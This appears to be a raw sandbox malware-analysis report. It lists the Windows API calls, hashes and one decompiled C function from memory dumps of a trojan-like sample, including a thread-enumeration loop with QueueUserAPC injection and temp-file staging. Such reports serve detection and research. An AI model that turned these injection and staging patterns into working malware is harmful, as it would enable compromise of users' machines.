                                • Part of subcall function 053CF559: RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053CF5BB
                                • Part of subcall function 053CF559: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 053CF5F3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                              • String ID:
                              • API String ID: 4198405257-0
                              • Opcode ID: 4e58bea5804cdc4ef706d20c8e50f798ba3352dc4408b06e5bc6017ce98f864b
                              • Instruction ID: 538c91f48466c744b2eb7c6320ddd7c4308569c71e7b4e04d6472197396738f3
                              • Opcode Fuzzy Hash: 4e58bea5804cdc4ef706d20c8e50f798ba3352dc4408b06e5bc6017ce98f864b
                              • Instruction Fuzzy Hash: A5617F72A0020AEFCF15CFA4EC89E9E7BB9FB04344F04456AF416DB251DBB49A54CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053CEEDE: memset.NTDLL ref: 053CEF00
                                • Part of subcall function 053CEEDE: CloseHandle.KERNEL32(?,?,?,?,?), ref: 053CEFAA
                              • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 053CA787
                              • CloseHandle.KERNEL32(?), ref: 053CA793
                              • PathFindFileNameW.SHLWAPI(?), ref: 053CA7A3
                              • lstrlenW.KERNEL32(00000000), ref: 053CA7AD
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 053CA7BE
                              • wcstombs.NTDLL ref: 053CA7CF
                              • lstrlen.KERNEL32(?), ref: 053CA7DC
                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?), ref: 053CA819
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053CA82B
                              • DeleteFileW.KERNEL32(?), ref: 053CA839
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                              • String ID:
                              • API String ID: 2256351002-0
                              • Opcode ID: cd54118dcabd48955982f327bcc837d912474edb6ff259b4e3909113849e5077
                              • Instruction ID: 236e414c79c297b9a6d2cd3582d2080c8bea9977e705d6265691401799b647b2
                              • Opcode Fuzzy Hash: cd54118dcabd48955982f327bcc837d912474edb6ff259b4e3909113849e5077
                              • Instruction Fuzzy Hash: 0231E876910209EBCF229FA4DD89CAE7FBAFF44355F004069FA12AA150DB318E55DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetTickCount.KERNEL32 ref: 053DD6B6
                              • CreateFileW.KERNEL32(053C4252,80000000,00000003,053F0244,00000003,00000000,00000000,?,00000000,?,053C4252), ref: 053DD6D3
                              • GetLastError.KERNEL32(?,00000000,?,053C4252), ref: 053DD77B
                                • Part of subcall function 053DA02D: lstrlen.KERNEL32(?,00000000,00000000,00000027,?,?,00000000,053DD07F,?,00000000,?,?,?,053C2E53,80000001), ref: 053DA063
                                • Part of subcall function 053DA02D: lstrcpy.KERNEL32(00000000,00000000), ref: 053DA087
                                • Part of subcall function 053DA02D: lstrcat.KERNEL32(00000000,00000000), ref: 053DA08F
                              • GetFileSize.KERNEL32(053C4252,00000000,?,00000001,?,00000000,?,053C4252), ref: 053DD706
                              • CreateFileMappingA.KERNEL32(053C4252,053F0244,00000002,00000000,00000000,053C4252), ref: 053DD71A
                              • lstrlen.KERNEL32(053C4252,?,00000000,?,053C4252), ref: 053DD736
                              • lstrcpy.KERNEL32(?,053C4252), ref: 053DD746
                              • GetLastError.KERNEL32(?,00000000,?,053C4252), ref: 053DD74E
                              • HeapFree.KERNEL32(00000000,053C4252,?,00000000,?,053C4252), ref: 053DD761
                              • CloseHandle.KERNEL32(053C4252,?,00000001,?,00000000,?,053C4252), ref: 053DD773
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                              • String ID:
                              • API String ID: 194907169-0
                              • Opcode ID: c3acb545a1a156309a056080b9ac1b2db26f350f7917017084d64f10fbb5d618
                              • Instruction ID: e0310367e5af29b1f8f0bd3f81af11c45f9bfa7863c5f8138bfe82dc2c0d1438
                              • Opcode Fuzzy Hash: c3acb545a1a156309a056080b9ac1b2db26f350f7917017084d64f10fbb5d618
                              • Instruction Fuzzy Hash: C9210CB5900208FFDB219FA4D889A9DBFB9FB04354F108469F506EA190D7719E44CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 053CAF95
                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 053CAFA1
                              • GetModuleHandleA.KERNEL32(?,064F96FC,00000000,?,00000000), ref: 053CAFC1
                              • GetProcAddress.KERNEL32(00000000), ref: 053CAFC8
                              • Thread32First.KERNEL32(?,0000001C), ref: 053CAFD8
                              • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 053CAFF3
                              • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 053CB004
                              • CloseHandle.KERNEL32(00000000), ref: 053CB00B
                              • Thread32Next.KERNEL32(?,0000001C), ref: 053CB014
                              • CloseHandle.KERNEL32(?), ref: 053CB020
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                              • String ID:
                              • API String ID: 2341152533-0
                              • Opcode ID: 8e31c907f6862948a9c4be50e62dfe0fd66a548f094020d65850b061dd2d8928
                              • Instruction ID: b45079694887a28a20cd265742089de8a533675f14a105547af18859fb8f8341
                              • Opcode Fuzzy Hash: 8e31c907f6862948a9c4be50e62dfe0fd66a548f094020d65850b061dd2d8928
                              • Instruction Fuzzy Hash: 7F214A72900118EFDF119FE4EC89CAEBFBDFB08350F00412AFA11AA190DB759D458BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetEvent.KERNEL32(?,?,053CEA6E), ref: 053DE611
                                • Part of subcall function 053C34EE: InterlockedExchange.KERNEL32(?,000000FF), ref: 053C34F5
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,053CEA6E), ref: 053DE631
                              • CloseHandle.KERNEL32(00000000,?,053CEA6E), ref: 053DE63A
                              • CloseHandle.KERNEL32(?,?,?,053CEA6E), ref: 053DE644
                              • RtlEnterCriticalSection.NTDLL(?), ref: 053DE64C
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 053DE664
                              • Sleep.KERNEL32(000001F4), ref: 053DE673
                              • CloseHandle.KERNEL32(?), ref: 053DE680
                              • LocalFree.KERNEL32(?), ref: 053DE68B
                              • RtlDeleteCriticalSection.NTDLL(?), ref: 053DE695
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                              • String ID:
                              • API String ID: 1408595562-0
                              • Opcode ID: 2f0f359b7d19f8ff44d9ba3e2d425feb0f132e90167bbdeaffa1427d4ae44956
                              • Instruction ID: ed85efe7f9fb8e8eada15bb05e8b93af84aa259f98dfd7045b4280e47f2dae89
                              • Opcode Fuzzy Hash: 2f0f359b7d19f8ff44d9ba3e2d425feb0f132e90167bbdeaffa1427d4ae44956
                              • Instruction Fuzzy Hash: D8114872610615ABCB31AB65EC4D95AFFFEBF04711B550918F2829F890CB7AE8009B74
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?,00000000,00000000,053DD9EF,00000011,?,00000001,00000000,?,-00000008), ref: 053CFD52
                              • RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 053CFD68
                              • memcpy.NTDLL(00000010,?,00000000), ref: 053CFD9E
                              • memcpy.NTDLL(00000010,00000000,?), ref: 053CFDB9
                              • CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 053CFDD7
                              • GetLastError.KERNEL32 ref: 053CFDE1
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053CFE04
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                              • String ID: (
                              • API String ID: 2237239663-3887548279
                              • Opcode ID: 45b78c6ae533eb449316d9d797177249e772ebce80a7b84cc6908b4fe7887d1a
                              • Instruction ID: 30781f477b75fca76275d24d487b5ccd179dab8219a415e5f20c26d9dd8d8b75
                              • Opcode Fuzzy Hash: 45b78c6ae533eb449316d9d797177249e772ebce80a7b84cc6908b4fe7887d1a
                              • Instruction Fuzzy Hash: 5031AC76900309EFCB21CFA9DC49AABBFBAFB44314F104429FD46D6251E6709E14DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E3C8A: RtlEnterCriticalSection.NTDLL(053F0488), ref: 053E3C92
                                • Part of subcall function 053E3C8A: RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053E3CA7
                                • Part of subcall function 053E3C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 053E3CC0
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 053E16FA
                              • memset.NTDLL ref: 053E170B
                              • lstrcmpi.KERNEL32(?,?), ref: 053E174B
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E1777
                              • memcpy.NTDLL(00000000,?,?), ref: 053E178B
                              • memset.NTDLL ref: 053E1798
                              • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 053E17B1
                              • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 053E17D4
                              • HeapFree.KERNEL32(00000000,?), ref: 053E17F1
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 694413484-0
                              • Opcode ID: 658995e7b8e81c88e4d6112cbfe84bf2c9019693c0ba81458755b451ecf75e5f
                              • Instruction ID: 27328fa970bf57a4560c2413df7d2d0f5cdb1d10e8956277cb9351f69b9404e0
                              • Opcode Fuzzy Hash: 658995e7b8e81c88e4d6112cbfe84bf2c9019693c0ba81458755b451ecf75e5f
                              • Instruction Fuzzy Hash: C0419E72A00219EFDB21CF94DC89A9EBBF9FF04354F144469F805E7291DB71AA05CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,C0000000,053C23FB,00000000,053C23FC,00000080,00000000,00000000,053E8BAA,747869A0,053C23FB,?), ref: 053C6DDA
                              • GetLastError.KERNEL32 ref: 053C6DE4
                              • WaitForSingleObject.KERNEL32(000000C8), ref: 053C6E09
                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 053C6E2A
                              • SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 053C6E52
                              • WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 053C6E67
                              • SetEndOfFile.KERNEL32(00000001), ref: 053C6E74
                              • GetLastError.KERNEL32 ref: 053C6E80
                              • CloseHandle.KERNEL32(00000001), ref: 053C6E8C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                              • String ID:
                              • API String ID: 2864405449-0
                              • Opcode ID: dd0f95ca346fff4bcf561cf23e6a2a0a889d8a33446ffaa7080d17c760c6ffd9
                              • Instruction ID: 2c563332c8af89e352bf7aae561c66811ff6a1b8c7ce860054407c9eb910566b
                              • Opcode Fuzzy Hash: dd0f95ca346fff4bcf561cf23e6a2a0a889d8a33446ffaa7080d17c760c6ffd9
                              • Instruction Fuzzy Hash: 90316D71910209AFEF218FA8DE4ABAE7FB9FB45315F1041A9F911EA0D0C7758E509B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000001,00000001,00000000,053D0E83,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000001), ref: 053C9809
                              • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 053C983D
                              • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 053C9845
                              • GetLastError.KERNEL32 ref: 053C984F
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 053C986B
                              • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 053C9884
                              • CancelIo.KERNEL32(?), ref: 053C9899
                              • CloseHandle.KERNEL32(?), ref: 053C98A9
                              • GetLastError.KERNEL32 ref: 053C98B1
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                              • String ID:
                              • API String ID: 4263211335-0
                              • Opcode ID: 93a0eb8a52d3a109f2aa51aca2033cf0fcddc46e532e411c4f3c4e7e10576b52
                              • Instruction ID: 7d6ca15f3a8a7a4f76bd0b60efd0b7c11d72fe8ece18dc881f1ef005ee67d55e
                              • Instruction Fuzzy Hash: B2215172910218AFCB129FA4DC499EE7FBEFB44310F014469F916DB180DB719A408BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,053DA363), ref: 053E7D43
                              • wsprintfA.USER32 ref: 053E7D6B
                              • lstrlen.KERNEL32(?), ref: 053E7D7A
                                • Part of subcall function 053E69F0: RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              • wsprintfA.USER32 ref: 053E7DBA
                              • wsprintfA.USER32 ref: 053E7DEF
                              • memcpy.NTDLL(00000000,?,?), ref: 053E7DFC
                              • memcpy.NTDLL(00000008,053EA3F8,00000002,00000000,?,?), ref: 053E7E11
                              • wsprintfA.USER32 ref: 053E7E34
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                              • String ID:
                              • API String ID: 2937943280-0
                              • Opcode ID: 55252ab96d1142e6cff0e4ad62daf46efefcafafed75531385f90e7b5cb08b74
                              • Instruction ID: 807da9e8882f098354b422ca3159eeeb4adde85c48c6f09e8e9f2ec99089588d
                              • Instruction Fuzzy Hash: 51412C76A00109EFCB14DFA8D889EAEB7FCFF44308B144555F919D7251EA70EA15CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?), ref: 053C5730
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 053C5742
                              • wcstombs.NTDLL ref: 053C5750
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 053C5774
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 053C5789
                              • mbstowcs.NTDLL ref: 053C5796
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053C57A8
                              • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 053C57C2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 316328430-0
                              • Opcode ID: 5b317e2826514d443aef814c9fa8e007d8d5960af9ef96a0ef2fc17e0e6126b6
                              • Instruction ID: 3f9e4a8bf1c37563c56ae984cb014a826efe4fd1988191df7e4571c242c3ebeb
                              • Instruction Fuzzy Hash: 6521597151020AFFCF219FA4DC49F9A7FBEFB44315F104165B601EA1A0DB719951DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3DA6
                              • lstrlen.KERNEL32(?,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3DC4
                              • RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 053D3DED
                              • memcpy.NTDLL(00000000,00000000,00000000,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3E04
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D3E17
                              • memcpy.NTDLL(00000000,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3E26
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?), ref: 053D3E8A
                                • Part of subcall function 053C8F84: RtlLeaveCriticalSection.NTDLL(?), ref: 053C9001
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                              • String ID:
                              • API String ID: 1635816815-0
                              • Opcode ID: bb78ac982545c3cfb7433f7b9f3d2b23681ce8697c6b70dfb09fcfd4947a449f
                              • Instruction ID: 3871266148c32442be97d91c2eac5a9f9424f9e69a6e778a1b39318a9a7fcc15
                              • Instruction Fuzzy Hash: AA417173A00218AFCB229F64EC48BAEBFBAFF04354F154865F9059B190D7B19D50DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 053E446A
                              • StrTrimA.SHLWAPI(?,?), ref: 053E448D
                              • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 053E44F6
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 053E4519
                              • DeleteFileA.KERNEL32(?,00003219), ref: 053E4542
                              • HeapFree.KERNEL32(00000000,?), ref: 053E4554
                              • HeapFree.KERNEL32(00000000,?,00003219), ref: 053E4565
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1078934163-0
                              • Opcode ID: 391f65a4682d134060cf45069ac9d8914b4a8e54616757c2ac56d5106c808ae6
                              • Instruction ID: 096c36a119a71b9aaf0bf981d59a74f30dcfe9069f1c72b312949ddedde0bea5
                              • Instruction Fuzzy Hash: D6419972204316AFDB11DF18DC49F6A7BECBB48704F040919F644DA1D1EBB0EA09CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 053DF498
                              • lstrcmpiW.KERNEL32(00000000,?), ref: 053DF4D0
                              • lstrcmpiW.KERNEL32(?,?), ref: 053DF4E5
                              • lstrlenW.KERNEL32(?), ref: 053DF4EC
                              • CloseHandle.KERNEL32(?), ref: 053DF514
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 053DF540
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 053DF55E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                              • String ID:
                              • API String ID: 1496873005-0
                              • Opcode ID: cd3fcc15310949ce1b889b5db21f4409770cd2cd4302e1f05884bfb187315c21
                              • Instruction ID: 89402a892c7ea7b82a812ccb311cd85cc3043c3e44da6871a75a4fd3852dba0d
                              • Instruction Fuzzy Hash: AF213072610205ABDB219F65ECC9E6BBBFDBF04784F040558F903EA145EB70EA459B70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,00000000,000000B7,?,00000001,053C548D,00000000,00000000,00000011), ref: 053E4DFC
                              • HeapFree.KERNEL32(00000000,00000000,00001ED2,00000000,000000B7,?,00000001,053C548D,00000000,00000000,00000011), ref: 053E4E6F
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 2078930461-0
                              • Opcode ID: cc4dd51edbb5a75acb8ade7914f3e8d3178aa8192dc8f1bc232846b256742e98
                              • Instruction ID: 77176624f3c4b9a9c4d43efdd18cd7553322d1d35548dbbc312363be022c6544
                              • Instruction Fuzzy Hash: 8911E371250329BBDB326A60AC4EF6B7F9EEB897A5F000111F6019E5D1EE624C58C7E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E049DA7FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                              				intOrPtr _v8;
                              				intOrPtr _t9;
                              				intOrPtr _t13;
                              				char* _t28;
                              				void* _t33;
                              				void* _t34;
                              				char* _t36;
                              				intOrPtr* _t40;
                              				char* _t41;
                              				char* _t42;
                              				char* _t43;
                              
                              				_t34 = __edx;
                              				_push(__ecx);
                              				_t9 =  *0x49dd2b8; // 0xe3a5a8
                              				_t1 = _t9 + 0x49de62c; // 0x253d7325
                              				_t36 = 0;
                              				_t28 = E049D2262(__ecx, _t1);
                              				if(_t28 != 0) {
                              					_t40 = __imp__;
                              					_t13 =  *_t40(_t28);
                              					_v8 = _t13;
                              					_t6 =  *_t40(_a4) + 1; // 0x58195b1
                              					_t41 = E049D55DC(_v8 + _t6);
                              					if(_t41 != 0) {
                              						strcpy(_t41, _t28);
                              						_pop(_t33);
                              						__imp__(_t41, _a4);
                              						_t36 = E049D66FF(_t34, _t41, _a8);
                              						E049D6DFA(_t41);
                              						_t42 = E049D4024(StrTrimA(_t36, "="), _t36);
                              						if(_t42 != 0) {
                              							E049D6DFA(_t36);
                              							_t36 = _t42;
                              						}
                              						_t43 = E049D484D(_t36, _t33);
                              						if(_t43 != 0) {
                              							E049D6DFA(_t36);
                              							_t36 = _t43;
                              						}
                              					}
                              					E049D6DFA(_t28);
                              				}
                              				return _t36;
                              			}

                              APIs
                                • Part of subcall function 049D2262: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,049DA815,253D7325,00000000,00000000,?,?,74785520,049D64DC), ref: 049D22C9
                                • Part of subcall function 049D2262: sprintf.NTDLL ref: 049D22EA
                              • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,049D64DC,?,058195B0), ref: 049DA826
                              • lstrlen.KERNEL32(?,?,74785520,049D64DC,?,058195B0), ref: 049DA82E
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • strcpy.NTDLL ref: 049DA845
                              • lstrcat.KERNEL32(00000000,?), ref: 049DA850
                                • Part of subcall function 049D66FF: lstrlen.KERNEL32(?,?,049D64DC,049D64DC,00000001,00000000,00000000,?,049DA85F,00000000,049D64DC,?,74785520,049D64DC,?,058195B0), ref: 049D6716
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,049D64DC,?,74785520,049D64DC,?,058195B0), ref: 049DA86D
                                • Part of subcall function 049D4024: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,049DA879,00000000,?,74785520,049D64DC,?,058195B0), ref: 049D402E
                                • Part of subcall function 049D4024: _snprintf.NTDLL ref: 049D408C
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                              • String ID: =
                              • API String ID: 2864389247-1428090586
                              • Opcode ID: 3d7e9a349dc4e4316045ff16d8176592ed082826fafc4af09645a94074a6cab2
                              • Instruction ID: c738f7d1efbe09db57c3de83103fc95db360be2a80befb1ae8274c6780aaf445
                              • Instruction Fuzzy Hash: E211A973901165BB97127BB9AC44C6F3AADDEC5668309C135FA05A7100DF38FD0297E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SwitchToThread.KERNEL32(?,?,053E2516), ref: 053C5DB6
                              • CloseHandle.KERNEL32(?,?,053E2516), ref: 053C5DC2
                              • CloseHandle.KERNEL32(00000000,747DF720,?,053E2320,00000000,?,?,?,053E2516), ref: 053C5DD4
                              • memset.NTDLL ref: 053C5DEB
                              • memset.NTDLL ref: 053C5E02
                              • memset.NTDLL ref: 053C5E19
                              • memset.NTDLL ref: 053C5E30
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memset$CloseHandle$SwitchThread
                              • String ID:
                              • API String ID: 3699883640-0
                              • Opcode ID: 9d0a5702f6bbff39a0167c9c03be12879c0332b9ed825e0a723c3750872f78ca
                              • Instruction ID: 7b40ac22914da68c393a391b8d38ae4bd9409c13b52dc397bb6e193804dcd48a
                              • Instruction Fuzzy Hash: D9110171A12160B7C626BB6DAC0EC4F3FACABD2B04F14006AF106BB193CB65680087B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              • lstrcpy.KERNEL32(-000000FC,00000000), ref: 053E2013
                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,053E3220,?,?,00000000,?,053C46AF,00000000), ref: 053E2025
                              • GetTickCount.KERNEL32 ref: 053E2030
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,053E3220,?,?,00000000,?,053C46AF,00000000), ref: 053E203C
